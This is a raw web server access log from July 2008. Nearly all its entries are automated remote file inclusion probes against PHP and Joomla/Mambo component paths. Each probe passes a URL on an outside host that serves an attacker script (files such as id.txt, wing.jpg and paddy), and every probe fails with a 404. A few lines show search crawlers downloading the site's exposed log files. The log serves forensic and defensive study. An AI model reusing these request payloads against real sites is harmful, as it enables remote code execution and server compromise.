125.245.146.189 - - [06/Jul/2008:20:46:41 -0700] "GET /lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
125.245.146.189 - - [06/Jul/2008:20:46:42 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://blogfoto.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
68.76.31.154 - - [06/Jul/2008:20:46:50 -0700] "GET /logs/access_080519.log/joomla/index.php?option=com_restaurante&task=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.165.34.81 - - [06/Jul/2008:20:48:06 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.165.34.81 - - [06/Jul/2008:20:48:08 -0700] "GET /logs/access.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.165.34.81 - - [06/Jul/2008:20:48:10 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.165.34.81 - - [06/Jul/2008:20:48:58 -0700] "GET /logs/access_080602.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
59.126.46.141 - - [06/Jul/2008:20:49:04 -0700] "GET /logs/access_080512.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.geocities.com/testsken/files/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.165.34.81 - - [06/Jul/2008:20:49:32 -0700] "GET /logs/access_080526.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.iglesialcs.cl/newweb//images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:49:58 -0700] "GET /logs/access.log/index2.php?DoAction=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.28.86.50 - - [06/Jul/2008:20:50:27 -0700] "GET /logs/access_080602.log//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.28.86.50 - - [06/Jul/2008:20:50:28 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.28.86.50 - - [06/Jul/2008:20:50:30 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:51:46 -0700] "GET /logs/access_080303.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:51:46 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:51:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:51:54 -0700] "GET /logs/access_080526.log/admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:51:54 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:51:55 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:52:18 -0700] "GET /logs/access_080519.log/admin/editeur/spaw_control.class.php?spaw_root=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.102.116 - - [06/Jul/2008:20:53:12 -0700] "GET /logs/errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
70.85.102.116 - - [06/Jul/2008:20:53:12 -0700] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:20:54:11 -0700] "GET /config.inc.php?path_escape=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.168.33.226 - - [06/Jul/2008:20:55:09 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
205.234.240.98 - - [06/Jul/2008:20:55:25 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.198.217.3 - - [06/Jul/2008:20:55:59 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:56:10 -0700] "GET /logs/access_080526.log/admin/editeur/spaw_control.class.php?spaw_root=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:56:10 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:56:12 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:56:24 -0700] "GET /logs/access_080331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:56:36 -0700] "GET /logs/access_080310.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:20:56:36 -0700] "GET /logs/access_080310.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:56:58 -0700] "GET /logs/access_080519.log/admin/editeur/spaw_control.class.php?spaw_root=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:57:09 -0700] "GET /logs/access_080609.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:57:10 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:20:57:10 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.233.85.46 - - [06/Jul/2008:20:58:37 -0700] "GET /logs/access.log/index2.php?DoAction=http://mobileathleticclub.com/sales-images/index_46.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.85.102.116 - - [06/Jul/2008:20:58:59 -0700] "GET /errors.php?error=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.mathstamps.com"
70.85.102.116 - - [06/Jul/2008:20:59:01 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kiarasiska/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.mathstamps.com"
65.55.212.94 - - [06/Jul/2008:21:02:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.mathstamps.com"
65.55.212.94 - - [06/Jul/2008:21:02:52 -0700] "GET /logs/access_080526.log HTTP/1.0" 200 5182527 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.mathstamps.com"
216.239.0.245 - - [06/Jul/2008:21:03:17 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.0.245 - - [06/Jul/2008:21:03:17 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:04:47 -0700] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.202.210 - - [06/Jul/2008:21:05:16 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.84.202.210 - - [06/Jul/2008:21:05:29 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.87.197.18 - - [06/Jul/2008:21:05:32 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.249.0.39 - - [06/Jul/2008:21:07:32 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:08:27 -0700] "GET /index2.php?DoAction=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:45 -0700] "GET /logs/access_080421.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:46 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:46 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:46 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:47 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:08:47 -0700] "GET /logs/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:21:09:26 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
70.84.182.98 - - [06/Jul/2008:21:09:27 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.geocities.com/testsken/files/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:09:44 -0700] "GET /logs/access_080609.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
193.254.184.51 - - [06/Jul/2008:21:09:45 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:10:04 -0700] "GET /logs/access_080526.log/index2.php?DoAction=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:10:04 -0700] "GET /logs/index2.php?DoAction=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:10:29 -0700] "GET /logs/access.log/index2.php?DoAction=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.88 - - [06/Jul/2008:21:11:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.88 - - [06/Jul/2008:21:11:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:11:48 -0700] "GET /logs/scripts.log//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:11:48 -0700] "GET //infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:11:48 -0700] "GET /logs//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:12:37 -0700] "GET /logs/access_080428.log/config.inc.php?path_escape=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:12:38 -0700] "GET /logs/config.inc.php?path_escape=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:12:47 -0700] "GET /logs/access_080519.log/config.inc.php?path_escape=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:21:12:48 -0700] "GET /logs/scripts.log//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:21:12:48 -0700] "GET //infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.27.98 - - [06/Jul/2008:21:12:48 -0700] "GET /logs//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images//id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.84.202.210 - - [06/Jul/2008:21:14:17 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.0.245 - - [06/Jul/2008:21:17:03 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.239.0.245 - - [06/Jul/2008:21:17:03 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
81.208.98.130 - - [06/Jul/2008:21:17:49 -0700] "GET /logs//components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
81.208.98.130 - - [06/Jul/2008:21:17:49 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:18:17 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:21:18:40 -0700] "GET /logs/scripts.log//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:21:18:41 -0700] "GET //infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.155.1.251 - - [06/Jul/2008:21:18:44 -0700] "GET /logs//infoevent.php3?rootagenda=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:19:16 -0700] "GET /logs/access_080609.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.216.220.170 - - [06/Jul/2008:21:19:16 -0700] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.93.225.34 - - [06/Jul/2008:21:19:41 -0700] "GET /logs/access_080414.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.93.225.34 - - [06/Jul/2008:21:19:41 -0700] "GET /index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.93.225.34 - - [06/Jul/2008:21:19:41 -0700] "GET /logs/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.76.111.11 - - [06/Jul/2008:21:21:15 -0700] "GET /logs/access_080414.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [06/Jul/2008:21:21:15 -0700] "GET /index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.76.111.11 - - [06/Jul/2008:21:21:15 -0700] "GET /logs/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:22:47 -0700] "GET /logs/access_080414.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:22:47 -0700] "GET /index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:22:47 -0700] "GET /logs/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.249.0.39 - - [06/Jul/2008:21:23:38 -0700] "GET //components/com_swmenufree/preview.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.118 - - [06/Jul/2008:21:24:38 -0700] "GET /logs/access_080609.log HTTP/1.0" 200 5056968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.8.118 - - [06/Jul/2008:21:26:25 -0700] "GET /logs/access_080616.log HTTP/1.0" 200 5490557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
69.93.225.34 - - [06/Jul/2008:21:26:53 -0700] "GET /logs/access_080428.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.86.91.115 - - [06/Jul/2008:21:29:13 -0700] "GET /logs/access_080428.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.76.111.11 - - [06/Jul/2008:21:30:14 -0700] "GET /logs/access_080428.log/index.php?option=com_zoom&&Itemid=&mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:21:30:30 -0700] "GET /logs/access_080526.log/include/functions_common.php?gl_root_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:21:30:30 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.170.49 - - [06/Jul/2008:21:30:30 -0700] "GET /include/functions_common.php?gl_root_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
